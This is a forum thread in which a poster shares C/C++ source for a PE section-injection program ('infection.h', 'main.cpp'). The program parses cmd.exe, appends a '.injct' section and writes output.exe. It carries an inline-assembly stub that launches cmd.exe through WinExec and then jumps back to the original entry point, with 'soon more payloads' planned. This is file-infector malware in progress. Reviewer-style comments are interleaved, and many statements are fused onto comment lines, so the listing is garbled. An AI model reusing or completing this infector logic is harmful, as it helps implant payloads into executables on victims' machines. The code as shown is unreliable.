
Problem with PE section Injection


Hello, this is my first post here :)

I'm writing a program to add a new section to a PE file at the moment....

But something goes wrong. I'm trying to locate what is wrong, but have found nothing yet.

You can find the source here:

infection.h

// Scratch record for values taken from the parsed PE headers and from
// GetProcAddress lookups done in main().
typedef struct _StaffToUse
{
    DWORD EIP;             // OptionalHeader.AddressOfEntryPoint (set in readFileHeaders)
    DWORD IMAGE_BASE;      // OptionalHeader.ImageBase
    DWORD VEP;             // AddressOfEntryPoint + ImageBase
    DWORD NumbOfSections;  // FileHeader.NumberOfSections
    DWORD WinExec_;        // GetProcAddress results from main(), cast to an integer
    DWORD LoadLib_;
    DWORD ExitProc_;

    // Per-section values, 32 slots each. readFileHeaders stores the integer
    // header fields here cast to pointer type; they are not addresses that
    // can be dereferenced.
    DWORD *VirtualS[32];
    DWORD *SizeOfRaw[32];
    DWORD *PointerToRaw[32];
    DWORD *VirtualAddr[32];
    BYTE *SectionNames[32];  // each entry points at _img_[i].Name
} StaffToUse;

// Holder for one section's raw bytes (heap buffer allocated in readFileHeaders).
typedef struct _DWDataStorage
{
    BYTE *dwData;
} DWDataStorage;

// File-scope state shared by every function in main.cpp. These are
// definitions, not declarations, so this header can be included by only one
// translation unit.
HANDLE hFile;
HANDLE oFile = NULL;
DWORD dwBytesRead;
DWORD Sections;
DWORD fSize = 0;
PCHAR pMem;
IMAGE_NT_HEADERS _nt;
DWDataStorage dw_[32];
IMAGE_DOS_HEADER header;
IMAGE_SECTION_HEADER *_img;
IMAGE_SECTION_HEADER _img_[32];
StaffToUse _help_my_ass;
PIMAGE_SECTION_HEADER Custom_hdr;
BYTE *ptrBuffer;
DWORD stub_size;
BYTE *stub;

//

main.cpp

//

#include <stdio.h>
#include <windows.h>
#include "infection.h"//yodap code .......................................................
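/**
 * Round dwTarNum up to the next multiple of dwAlignTo.
 *
 * @param dwTarNum   value to align (a size or an offset).
 * @param dwAlignTo  alignment; the callers pass FileAlignment or
 *                   SectionAlignment read from the parsed file's header.
 * @return dwTarNum rounded up to a multiple of dwAlignTo, or dwTarNum
 *         unchanged when dwAlignTo is 0.
 *
 * The arithmetic is done in DWORD, so a value close to the DWORD maximum
 * wraps around and yields a small result. Callers that size buffers from
 * the return value must range-check their inputs themselves.
 */
DWORD PEAlign(DWORD dwTarNum,DWORD dwAlignTo)
{
    // The alignment comes from file content; a zero there would otherwise
    // be a division by zero.
    if (dwAlignTo == 0) {
        return dwTarNum;
    }
    return (((dwTarNum + dwAlignTo - 1) / dwAlignTo) * dwAlignTo);
}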
// NOTE(review): this listing lost line breaks when it was posted. Several
// statements are fused onto the end of `//` comment lines (the CmdLoader
// signature just below, `_img_[i].PointerToRawData=roffset;`, the
// readFileHeaders signature, and the pMem allocation and CreateFile call in
// main), so the text as shown is presumably not what the author compiled.
// Confirm statement boundaries against the original files.
//
// CmdLoader: MSVC inline-assembly stub. It stores the bytes
// 63 6d 64 2e 65 78 65 00 ("cmd.exe") on the stack at [ebp-15]..[ebp-8],
// pushes 1 and the address of that string, calls the address held in
// _help_my_ass.WinExec_, then jumps to _help_my_ass.VEP. Nothing in this
// listing calls CmdLoader or copies it into the output file.
//...................................................................void CmdLoader(){
//cmd shell
__asm{ pushad
pushfd xor eax, eax
xor ecx, ecx mov dword ptr[ebp-15],0x63
mov dword ptr[ebp-14],0x6d
mov dword ptr[ebp-13],0x64
mov dword ptr[ebp-12],0x2e
mov dword ptr[ebp-11],0x65
mov dword ptr[ebp-10],0x78
mov dword ptr[ebp-9],0x65
mov dword ptr[ebp-8],0x00 push 0x1
lea eax, [ebp-15]
push eax
mov ecx, _help_my_ass.WinExec_
call ecx mov eax, _help_my_ass.VEP jmp eax }; //soon more payloads.... //....................
// AddNewSection (signature on the next line, after the `}` that closes
// CmdLoader): fills section-header slot _img_[NumberOfSections] for a new
// section named szName holding dwSize bytes, then increments
// _nt.FileHeader.NumberOfSections.
// _img_ has 32 slots and readFileHeaders accepts up to 32 sections, so for a
// 32-section input the index i == 32 is one past the end of the array.
// For defenders: the output carries an extra section header and a changed
// NumberOfSections, so it no longer matches the original file's hash.
}void AddNewSection(char* szName,DWORD dwSize)
{
DWORD roffset,rsize,voffset,vsize; int i=_nt.FileHeader.NumberOfSections;
//yodap code............................................................................
................
// Raw size is rounded up to FileAlignment and virtual size to
// SectionAlignment; both offsets are placed after the end of the last
// existing section (_img_[i-1]). The alignment values come from the parsed
// file and are not validated before use.
rsize=PEAlign(dwSize,_nt.OptionalHeader.FileAlignment); vsize=PEAlign(rsize,_nt.OptionalHeader.SectionAlignment); roffset=PEAlign(_img_[i-1].PointerToRawData+_img_[i-1].SizeOfRawData,_nt.OptionalHeader.FileAlignment); voffset=PEAlign(_img_[i-1].VirtualAddress+_img_[i-1].Misc.VirtualSize,_nt.OptionalHeader.SectionAlignment);
//------------------------------------------------------------------------------------------------------- _img_[i].PointerToRawData=roffset;
_img_[i].VirtualAddress=voffset;
_img_[i].SizeOfRawData=rsize;
_img_[i].Misc.VirtualSize=vsize;
// 0xC0000040 = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ |
// IMAGE_SCN_MEM_WRITE.
// The name copy is bounded by strlen(szName), not by the 8-byte Name field
// (IMAGE_SIZEOF_SHORT_NAME); the only caller in this listing passes ".injct".
//
// readFileHeaders (its signature is fused onto the `//memcpy` comment on the
// next line): reads `file` completely into ptrBuffer and copies the DOS
// header, the DOS stub, the NT headers and each section header plus section
// data into the file-scope globals. Returns 1 on success and 0 after showing
// a message box on failure.
// Gaps visible in this function: hFile is never closed, no malloc result is
// checked, GetFileSize's high dword is discarded and its failure value is
// not tested, and ReadFile's return value is not tested (only dwBytesRead).
_img_[i].Characteristics=0xC0000040; memcpy(_img_[i].Name,szName,(size_t)strlen(szName)); _nt.FileHeader.NumberOfSections++; //memcpy(&Custom_hdr,&_img_[i],sizeof(_img_[i]));}int readFileHeaders(char*file){ hFile = CreateFile( file,GENERIC_READ,FILE_SHARE_WRITE | FILE_SHARE_READ,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); if(hFile == INVALID_HANDLE_VALUE){ MessageBoxA(0,"File Not Found","Error",MB_ICONEXCLAMATION|MB_OK);
return 0; } fSize = GetFileSize(hFile,NULL); if(fSize <= 60 ){
MessageBoxA(0,"File Size Error","Error",MB_ICONEXCLAMATION|MB_OK); return 0; }else{ ptrBuffer = (BYTE*)malloc(fSize+1); } //read the file
ReadFile( hFile, ptrBuffer, fSize, &dwBytesRead, NULL ); if(dwBytesRead != fSize){ MessageBoxA(0,"Read Size Error","Error",MB_ICONEXCLAMATION|MB_OK); return 0; } //copy the dos header
// header.e_lfanew comes from the file. It is used here before e_magic is
// checked and without a range check: a value below sizeof(IMAGE_DOS_HEADER)
// makes stub_size wrap to a very large DWORD, and a value past fSize makes
// the copies below read outside ptrBuffer. The only size test so far is
// fSize > 60.
memcpy(&header, ptrBuffer, sizeof(IMAGE_DOS_HEADER)); stub_size = header.e_lfanew - sizeof(IMAGE_DOS_HEADER); stub = (BYTE*)malloc(stub_size); memcpy(stub,ptrBuffer+ sizeof(IMAGE_DOS_HEADER),stub_size); if(header.e_magic != IMAGE_DOS_SIGNATURE){ MessageBoxA(0,"Not A Valid Dos Stub","Error",MB_ICONEXCLAMATION|MB_OK); return 0; };
//copy the pe header
memcpy(&_nt,ptrBuffer + header.e_lfanew,sizeof(IMAGE_NT_HEADERS)); if(_nt.Signature != IMAGE_NT_SIGNATURE){ MessageBoxA(0,"Not A Valid PE Executable","Error",MB_ICONEXCLAMATION|MB_OK); return 0;
}
//place **** to my structure
_help_my_ass.EIP = _nt.OptionalHeader.AddressOfEntryPoint;
_help_my_ass.IMAGE_BASE = _nt.OptionalHeader.ImageBase;
_help_my_ass.VEP = _nt.OptionalHeader.AddressOfEntryPoint + _nt.OptionalHeader.ImageBase;
//read the sections
Sections = _nt.FileHeader.NumberOfSections;
_help_my_ass.NumbOfSections = Sections;
//fill the image section structure
// The section table is assumed to start sizeof(IMAGE_NT_HEADERS) bytes after
// e_lfanew; FileHeader.SizeOfOptionalHeader is not consulted. The section
// count is limited to 1..32, but the table's extent is not checked against
// fSize.
// The PointerToRaw/SizeOfRaw/VirtualAddr/VirtualS entries filled in below
// hold the header's integer values cast to pointer type, not addresses.
_img = (IMAGE_SECTION_HEADER *)(ptrBuffer + header.e_lfanew+sizeof(IMAGE_NT_HEADERS)); if( (Sections < 1) || (Sections > 32) ){ MessageBoxA(0,"Error With File Sections","Error",MB_ICONEXCLAMATION|MB_OK); return 0; } for(DWORD i=0; i<= Sections-1; i++){ memcpy(&_img_[i],_img,sizeof(IMAGE_SECTION_HEADER));
_help_my_ass.SectionNames[i] = _img_[i].Name;
_help_my_ass.PointerToRaw[i] = (unsigned long*)_img_[i].PointerToRawData;
_help_my_ass.SizeOfRaw[i] = (unsigned long*)_img_[i].SizeOfRawData;
_help_my_ass.VirtualAddr[i] = (unsigned long*)_img_[i].VirtualAddress;
_help_my_ass.VirtualS[i] =(unsigned long*) _img_[i].Misc.VirtualSize;
//allocate memory to store the datas from each section
// The buffer is sized from SizeOfRawData rounded up to FileAlignment; the
// copy then reads SizeOfRawData bytes at PointerToRawData without checking
// that the range lies inside the fSize bytes that were read. Both fields are
// file-controlled, so a malformed header leads to an out-of-bounds read.
DWORD size_to = PEAlign(_img_[i].SizeOfRawData,_nt.OptionalHeader.FileAlignment);
dw_[i].dwData = (BYTE*)malloc(size_to);
//copy them
memcpy(dw_[i].dwData,ptrBuffer+_img_[i].PointerToRawData,_img_[i].SizeOfRawData);
_img++;
} return 1;
// main (signature on the next line, after the `}` that closes
// readFileHeaders): looks up three kernel32 exports in this process, parses
// the hard-coded input path, then writes the DOS header, the stub, the NT
// headers (after AddNewSection), the section headers and the section data
// to output.exe one after another.
// The return value of readFileHeaders is ignored, so a parse failure is
// followed by writes from unset globals. No WriteFile result and no handle
// from CreateFile is checked, and oFile is never closed in this listing.
}int main(){
char *_file = "c:\\windows\\system32\\cmd.exe";
DWORD i; _help_my_ass.WinExec_ = (unsigned long)GetProcAddress(LoadLibrary("KERNEL32.DLL"),"WinExec");
_help_my_ass.LoadLib_ = (unsigned long)GetProcAddress(LoadLibrary("KERNEL32.DLL"),"LoadLibrary");
_help_my_ass.ExitProc_ = (unsigned long)GetProcAddress(LoadLibrary("KERNEL32.DLL"),"ExitProcess"); readFileHeaders(_file); printf("Current EIP :%x\n",_help_my_ass.EIP); //_nt.OptionalHeader.AddressOfEntryPoint = 0x01ffff; pMem = (char*)malloc(fSize); memcpy(pMem,&header,sizeof(IMAGE_DOS_HEADER)); oFile = CreateFile("output.exe",
GENERIC_WRITE,
FILE_SHARE_WRITE | FILE_SHARE_READ,
NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL); //write the DOS HEADER
WriteFile(oFile,pMem,sizeof(IMAGE_DOS_HEADER),&dwBytesRead,NULL);
//write the stub junk****
WriteFile(oFile,stub,stub_size,&dwBytesRead,NULL);
//Make New Section
AddNewSection(".injct",0x22400);
//Write NT HEADER
memcpy(pMem,&_nt,sizeof(IMAGE_NT_HEADERS));
WriteFile(oFile,pMem,sizeof(IMAGE_NT_HEADERS),&dwBytesRead,NULL); //write the sections
for(i=0; i<=Sections;i++){ memcpy(pMem,&_img_[i],sizeof(IMAGE_SECTION_HEADER));
WriteFile(oFile,pMem,sizeof(IMAGE_SECTION_HEADER),&dwBytesRead,NULL);
}
//write sections data for(i=0; i<=Sections-1; i++){
memcpy(pMem,dw_[i].dwData,_img_[i].SizeOfRawData); WriteFile(oFile,pMem,_img_[i].SizeOfRawData,&dwBytesRead,NULL); } //write data for the new section later return 0;
}

That source generates a broken executable file instead of a correct one.

Any help will be gratefully received :)

  • Author

anyway i fix that :)

  • 2 weeks later...

Can you attach a before and after exe to compare?

Hi.

Looking at this purely from a coder's perspective, if someone came looking for help with adding a section to a PE file and their problem has a similar cause/effect, they might benefit from the information you can provide about why your code was wrong and how you fixed it.

Plus it's only fair (imho) that when you are prepared to ask for help with a coding/rce situation, you should also be prepared to help if you can, and sometimes this is as simple as sharing the fix to your woes.

HR.

Ghandi

Hi, can you post full source here?

Thanks
